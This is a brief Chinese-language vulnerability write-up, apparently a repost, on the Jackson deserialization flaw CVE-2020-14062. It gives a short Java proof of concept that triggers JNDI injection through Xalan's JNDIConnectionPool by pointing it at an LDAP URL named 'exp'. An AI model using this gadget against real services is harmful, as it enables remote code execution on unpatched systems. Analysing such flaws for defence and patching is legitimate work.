一分钟看完JackSon漏洞

admin 2023年11月16日14:53:27评论41 views字数 435阅读1分27秒阅读模式

CVE-2020-14062

首先是:

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");JNDIConnectionPool jndiConnectionPool = new JNDIConnectionPool();jndiConnectionPool.setJndiPath("ldap://127.0.0.1:1098/exp");jndiConnectionPool.getConnection();

主要问题就是JNDI注入。

漏洞点:

com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool

一分钟看完JackSon漏洞

在其getConnection方法会调用进去。

一分钟看完JackSon漏洞

所以这里直接设置一个JNDIpath即可。

一分钟看完JackSon漏洞

一分钟看完JackSon漏洞

而漏洞分析就简单了,其实就是调用get set来造成漏洞的。

调用栈如下:

一分钟看完JackSon漏洞


原文始发于微信公众号(HACK安全):一分钟看完JackSon漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月16日14:53:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一分钟看完JackSon漏洞http://cn-sec.com/archives/2210684.html

发表评论

匿名网友 填写信息